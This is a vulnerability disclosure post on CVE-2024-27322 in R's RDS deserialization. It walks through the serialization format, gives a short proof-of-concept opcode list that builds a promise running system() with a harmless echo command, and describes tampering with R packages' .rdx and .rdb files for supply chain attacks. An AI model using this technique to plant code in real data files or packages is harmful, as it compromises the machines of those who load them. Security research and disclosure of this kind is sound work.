URL: https://hiddenlayer.com/research/r-bitrary-code-execution/

Research
04.29.2024
Adversarial Machine Learning Cyber Threat Intelligence Cybersecurity


R-BITRARY CODE EXECUTION: VULNERABILITY IN R’S DESERIALIZATION

By: Kasimir Schulz, Kieran Evans



TABLE OF CONTENTS

 * Summary
 * Introduction
 * Vulnerability Overview
 * R Supply Chain Attacks
 * Conclusion


SUMMARY

HiddenLayer researchers have discovered a vulnerability, CVE-2024-27322, in the
R programming language that allows for arbitrary code execution by deserializing
untrusted data. This vulnerability can be exploited through the loading of RDS
(R Data Serialization) files or R packages, which are often shared between
developers and data scientists. An attacker can create malicious RDS files or R
packages containing embedded arbitrary R code that executes on the victim’s
target device upon interaction.


INTRODUCTION

WHAT IS R?

R is an open-source programming language and software environment for
statistical computing, data visualization, and machine learning. Consisting of a
strong core language and an extensive list of libraries for additional
functionality, it is only natural that R is popular and widely used today, often
being the only programming language that statistics students learn in school. As
a result, the R language holds a significant share in industries such as
healthcare, finance, and government, each employing it for its prowess in
performing statistical analysis in large datasets. Due to its usage with large
datasets, R has also become increasingly popular in the AI/ML field.

To further underscore R’s pervasiveness, many R conferences are hosted around
the world, such as the R Gov Conference, which features speakers from major
organizations such as NASA, the World Health Organization (WHO), the US Food and
Drug Administration (FDA), the US Army, and so on. R’s use within the biomedical
field is also very established, with pharmaceutical giants like Pfizer and Merck
& Co. actively speaking about R at similar conferences. 

R also has a dedicated following in the open-source community. Bioconductor, a
project referenced in the R project's documentation, boasted over 42 million
downloads and 18,999 active support site members last year. R users love R,
which is even more evident when we consider CRAN, the R equivalent of Python’s
PyPI.

The Comprehensive R Archive Network (CRAN) repository hosts over 20,000 packages
to date. The R-project website also links to the project repository R-forge,
which claims to host over 2,000 projects with over 15,000 registered users at
the time of writing. 

All of this is to say that the exploitation of a code execution vulnerability in
R can have far-reaching implications across multiple verticals, including but
not limited to vital government agencies, medical, and financial institutions.

So, how does an attack on R work? To understand this, we have to look at the R
Data Serialization process, or RDS, for short.

WHAT IS RDS?

Before explaining what RDS is in relation to R, we will first give a brief
overview of data serialization. Serialization is the process of converting a
data structure or object into a format that can be stored locally or transferred
over a network. Conversely, serialized objects can be reconstructed
(deserialized) for use as and when needed. As HiddenLayer’s SAI team has
previously written about, the serialization and deserialization of data can
often be vulnerable to exploitation when callable objects are involved in the
process.

R has a serialization format of its own whereby a user can serialize an object
using saveRDS and deserialize it using readRDS. It’s worth mentioning that this
format is also leveraged when R packages are saved and loaded. When a package is
compiled, a .rdb file containing serialized representations of objects to be
included is created. The .rdb file is accompanied by a .rdx file containing
metadata relating to the binary blobs now stored in the .rdb file. When the
package is loaded, R uses the .rdx index file to locate the data stored in the
.rdb file and deserializes it in the same way as RDS data.

Multiple functions within R can be used to serialize and deserialize data. They
differ slightly from each other but ultimately leverage the same internal code.
For example, serialize() works slightly differently from saveRDS(), and the same
is true for their counterparts, unserialize() and readRDS(). As you will see
later, both of these work their way through to the same internal function for
deserializing the data.


VULNERABILITY OVERVIEW

Our team discovered that it is possible to craft a malicious RDS file that will
execute arbitrary code when loaded and referenced. This vulnerability, assigned
CVE-2024-27322, involves the use of promise objects and lazy evaluation in R.

R’S INTERPRETED SERIALIZATION FORMAT

As we mentioned earlier, several functions and code paths lead to an RDS file or
blob getting deserialized. However, regardless of where that request originated,
it eventually leads to the R_Unserialize function inside of serialize.c, which
is what our team homed in on. Like most other formats, RDS contains a header,
which is the first component parsed by the R_Unserialize function. 

The header for an RDS binary blob contains five main components:

 * the file format
 * the version of the file
 * the R version that was used to serialize the blob
 * the minimum R version needed to read the blob
 * depending on the version number, a string representing the native encoding.

RDS files can be either an ASCII format, a binary format, or an XDR format, with
the XDR format being the most prevalent. Each has its own magic numbers, which,
while only needing one byte, are stored in two bytes; however, due to an issue
with the ASCII format, files can sometimes have a magic number of three bytes in
the header. After reading the two – or sometimes three – byte magic number for
the format, the R_Unserialize function reads the other header items, which are
each considered an integer (4 bytes for both the XDR and binary formats and up
to 127 bytes for the ASCII format). If the file version is 2, no header checks
are performed. If the file version is 3, then the function reads another
integer, checks its size, and then reads a string of that length into the
native_encoding variable, which is set to ‘UTF-8’ by default. If the version is
neither 2 nor 3, then the writer version and minimum reader versions are
checked. Once the header has been read and validated, the function tries to read
an item from the blob.
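
The header walk described above can be sketched in Python. This is a minimal
illustration, not R's implementation: it handles only the XDR format, assumes
the blob has already been decompressed (files written by saveRDS are
gzip-compressed by default), and simply rejects versions other than 2 and 3.
The names parse_xdr_header, decode_version, and MAX_ENCODING_LEN are
hypothetical, and the length bound is an assumed sanity limit rather than R's
own constant.

```python
import struct

# Two-byte format markers at the start of a serialization stream.
FORMATS = {b"X\n": "xdr", b"A\n": "ascii", b"B\n": "binary"}

# Hypothetical sanity bound on the encoding-name length (an assumption).
MAX_ENCODING_LEN = 64


def decode_version(packed):
    """Split a packed version integer into (major, minor, patch)."""
    return (packed >> 16, (packed >> 8) & 0xFF, packed & 0xFF)


def parse_xdr_header(blob):
    """Return (header dict, offset of the first item) for an XDR stream."""
    fmt = FORMATS.get(bytes(blob[:2]))
    if fmt != "xdr":
        raise ValueError(f"only the XDR format is handled here, got {fmt!r}")

    # Three big-endian 4-byte integers follow the format marker.
    version, writer, min_reader = struct.unpack_from(">iii", blob, 2)
    offset = 2 + 12

    encoding = None
    if version == 3:
        # Version 3 adds a length-prefixed native encoding string.
        (length,) = struct.unpack_from(">i", blob, offset)
        offset += 4
        if not 0 <= length <= MAX_ENCODING_LEN:
            raise ValueError("implausible native encoding length")
        encoding = bytes(blob[offset:offset + length]).decode("ascii")
        offset += length
    elif version != 2:
        raise ValueError(f"unsupported serialization version {version}")

    header = {
        "format": fmt,
        "version": version,
        "writer": decode_version(writer),
        "min_reader": decode_version(min_reader),
        "encoding": encoding,
    }
    return header, offset
```

The returned offset marks where the first serialized item begins, which is
where the instruction parsing described next would start.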

The RDS format is interesting because while consisting of bytecode that gets
parsed and run in the interpreter inside the ReadItem function, the instructions
do not include a halt, stop, or return command. The deserialization function
will only ever return one object, and once that object has been read, the
parsing will end. This means that one technical challenge for an exploit is that
it needs to fit naturally into an existing object type and cannot be inserted
before or after the returned object. However, despite this limitation, almost
all objects in the R language can be serialized and deserialized using RDS due
to attributes, tags, and nested values through the internal CAR and CDR
structures. 

The RDS interpreter contains 36 possible bytecode instructions in the ReadItem
function, with several additional instructions becoming available when used in
relation to one of the main instructions. RDS instructions all have different
lengths based on what they do; however, they all start with one integer that is
encoded with the instruction and all of the flags through bit masking.
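
To make the bit masking concrete, here is a small Python sketch that splits
one such integer into its parts. The bit positions (type in the low 8 bits,
object/attribute/tag flags at bits 8 to 10, "levels" from bit 12 upward)
reflect our reading of the macros in serialize.c and should be checked against
the R source for the version you are analyzing. ItemFlags, unpack_flags, and
pack_flags are hypothetical names.

```python
from typing import NamedTuple


class ItemFlags(NamedTuple):
    type_code: int   # which instruction / SEXP type this item is
    levels: int      # per-object "levels" bits (e.g. string encoding marks)
    is_object: bool  # object bit is set
    has_attr: bool   # an attribute list follows the item
    has_tag: bool    # a tag follows the item


def unpack_flags(word):
    """Decode the leading integer of a serialized item."""
    return ItemFlags(
        type_code=word & 0xFF,
        levels=word >> 12,
        is_object=bool(word & (1 << 8)),
        has_attr=bool(word & (1 << 9)),
        has_tag=bool(word & (1 << 10)),
    )


def pack_flags(flags):
    """Inverse of unpack_flags, useful when building test streams."""
    word = flags.type_code | (flags.levels << 12)
    if flags.is_object:
        word |= 1 << 8
    if flags.has_attr:
        word |= 1 << 9
    if flags.has_tag:
        word |= 1 << 10
    return word
```

Under this layout, the integer 0x00040009 decodes to type 9 with levels 64 and
no flags set, which lines up with the CHARSXP entries carrying the value 64 in
the payload listing later in this post.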

THE PROMISE OF AN EXPLOIT

After spending some time perusing the deserialization code, we found a few
functions that seemed questionable but did not have an actual vulnerability,
that is, until we came across an instruction that created the promise object. To
understand the promise object, we need to first understand lazy evaluation. Lazy
evaluation is a strategy that allows for symbols to be evaluated only when
needed, i.e., when they are accessed. One such example is the delayedAssign
function that allows a variable to be assigned once it has been accessed:

Figure 1: DelayedAssign Function

The above is achieved by creating a promise object that has both a symbol and an
expression attached to it. Once the symbol ‘y’ is accessed, the expression
assigning the value of ‘x’ to ‘y’ is run. The key here is that ‘y’ is not
assigned the value 1 because ‘y’ is not assigned to ‘x’ until it is accessed.
While we were not successful in gaining code execution within the
deserialization code itself, we thought that since we could create all of the
needed objects, it might be possible to create a promise that would be evaluated
once someone tried to use whatever had been deserialized.
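
The idea of a promise can be modeled outside of R. The Python sketch below is
an analogy only, not R's implementation: a hypothetical Promise class holds an
expression and an initially unbound value, and the expression runs the first
time the value is requested. The _UNBOUND sentinel and the payload function
are illustrative stand-ins.

```python
# Sentinel standing in for "no value has been computed yet".
_UNBOUND = object()


class Promise:
    """Holds an expression that is evaluated on first access only."""

    def __init__(self, expression, value=_UNBOUND):
        self._expression = expression
        self._value = value

    def force(self):
        # An unbound value is what triggers evaluation of the expression.
        if self._value is _UNBOUND:
            self._value = self._expression()
        return self._value


log = []


def payload():
    # Stand-in for arbitrary code carried inside the promise.
    log.append("expression ran")
    return 42


promise = Promise(payload)
ran_before_access = list(log)  # creating the promise runs nothing

first = promise.force()   # first access evaluates the expression
second = promise.force()  # later accesses reuse the cached value
```

Creating the object has no side effects; the side effect happens at the point
of use, which is why a deserializer that merely constructs a promise can still
hand the caller something that executes code later.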

THE UNBOUNDED PROMISE

After some research, we found that if we created a promise where, instead of
setting a symbol, we set the unbound value, we could create a payload that
would run the expression when the promise was accessed:

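# Promise whose value is unbound, so its expression is evaluated on access.
Opcode(TYPES.PROMSXP, 0, False, False, False, None, False),
Opcode(TYPES.UNBOUNDVALUE_SXP, 0, False, False, False, None, False),
# The expression: a call (language object) headed by the symbol `system` ...
Opcode(TYPES.LANGSXP, 0, False, False, False, None, False),
Opcode(TYPES.SYMSXP, 0, False, False, False, None, False),
Opcode(TYPES.CHARSXP, 64, False, False, False, "system", False),
# ... with a one-element argument list holding the shell command string.
Opcode(TYPES.LISTSXP, 0, False, False, False, None, False),
Opcode(TYPES.STRSXP, 0, False, False, False, 1, False),
Opcode(TYPES.CHARSXP, 64, False, False, False, 'echo "pwned by HiddenLayer"', False),
# Nil value terminating the argument list.
Opcode(TYPES.NILVALUE_SXP, 0, False, False, False, None, False),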

Once the malicious file has been created and loaded by R, the exploit will run
no matter how the variable is referenced:

Figure 2: readRDS Exploited


R SUPPLY CHAIN ATTACKS

SHARING OBJECTS

After searching GitHub, our team discovered that readRDS, one of the many ways
this vulnerability can be exploited, is referenced in over 135,000 R source
files. Looking through the repositories, we found that a large amount of the
usage was on untrusted, user-provided data, which could lead to a full
compromise of the system running the program. Some source files containing
potentially vulnerable code included projects from RStudio, Facebook, Google,
Microsoft, AWS, and other major software vendors.

R PACKAGES

R packages allow for the sharing of compiled R code and data that can be
leveraged by others in their statistical tasks. As previously mentioned, at the
time of writing, the CRAN package repository claims to feature 20,681 available
packages. Packages can be uploaded to this repository by anybody; there are
criteria a package must fulfill in order to be accepted, such as the fact that
the package must contain certain files (such as a description) and must pass
certain automated checks (which do not check for this vulnerability).

To recap, R packages leverage the RDS format to save and load data. When a
package is compiled, two files are created that facilitate this:

 * .rdb file: objects to be included within the package are serialized into this
   file as binary blobs of data;
 * .rdx file: contains metadata associated with each serialized object within
   the .rdb file, including their offsets.

When a package is loaded, the metadata stored in the RDS format within the .rdx
file is used to locate the objects within the .rdb file. These objects are then
decompressed and deserialized, essentially loading them as RDS files. 
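
The lookup step can be sketched as follows. This is a simplified illustration
under stated assumptions: it takes the (offset, length) pair for one object as
already read from the .rdx index, and it assumes each record in the .rdb file
is a 4-byte big-endian uncompressed size followed by a zlib stream, which is
our understanding of R's default lazy-load compression and should be verified
against the R source. fetch_record is a hypothetical helper name.

```python
import struct
import zlib


def fetch_record(rdb_bytes, offset, length):
    """Return the serialized bytes of one object stored in an .rdb blob.

    Assumed record layout: 4-byte big-endian uncompressed size, then
    zlib-compressed data. Other compression types are not handled.
    """
    record = rdb_bytes[offset:offset + length]
    if len(record) != length or length < 4:
        raise ValueError("record lies outside the .rdb data")

    (expected_size,) = struct.unpack_from(">I", record, 0)
    payload = zlib.decompress(record[4:])
    if len(payload) != expected_size:
        raise ValueError("decompressed size does not match the record header")

    # The payload is an ordinary serialization stream at this point.
    return payload
```

The bytes returned here go through the same deserialization path as any other
RDS data, so every record in the .rdb file is a possible carrier for a crafted
stream.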

This means R packages are vulnerable to the deserialization vulnerability and
can, therefore, be used as part of a supply chain attack via package
repositories. For an attacker to take over an R package, all they need to do is
overwrite the .rdx file with the maliciously crafted file, and when the package
is loaded, it will automatically execute the code.

If one of the main system packages, such as compiler, has been modified, then
the malicious code will run when R is initialized.


However, one of the most dangerous components of this vulnerability is that
instead of simply replacing the .rdx file, the exploit can be injected into any
of the offsets inside of the RDB file, making it incredibly difficult to detect.


CONCLUSION

R is an open-source statistical programming language used across multiple
critical sectors for statistical computing tasks and machine learning. Its
package building and sharing capabilities make it flexible and community-driven.
However, a drawback to this is that not enough scrutiny is being placed on
packages being uploaded to repositories, leaving users vulnerable to supply
chain attacks.

R’s serialization and deserialization process, which is used when creating and
loading RDS files and packages, has an arbitrary code execution vulnerability.
An attacker can exploit this by crafting a file in RDS format that contains a
promise instruction setting the value to unbound_value and the expression to
arbitrary code. Due to lazy evaluation, the expression is evaluated and run only
when the symbol associated with the RDS file is accessed. Therefore, if this is
simply an RDS file that a user assigns to a symbol (variable) in order to work
with it, the arbitrary code will be executed when the user references that
symbol. If the object is compiled within an R
package, the package can be added to an R repository such as CRAN, and the
expression will be evaluated and the arbitrary code run when a user loads that
package.

Given the widespread usage of R and the readRDS function, the implications of
this are far-reaching. Having followed our responsible disclosure process, we
have worked closely with the team at R who have worked quickly to patch this
vulnerability within the most recent release – R v4.4.0. In addition,
HiddenLayer’s AISec Platform will provide additional protection from this
vulnerability in its Q2 product release.
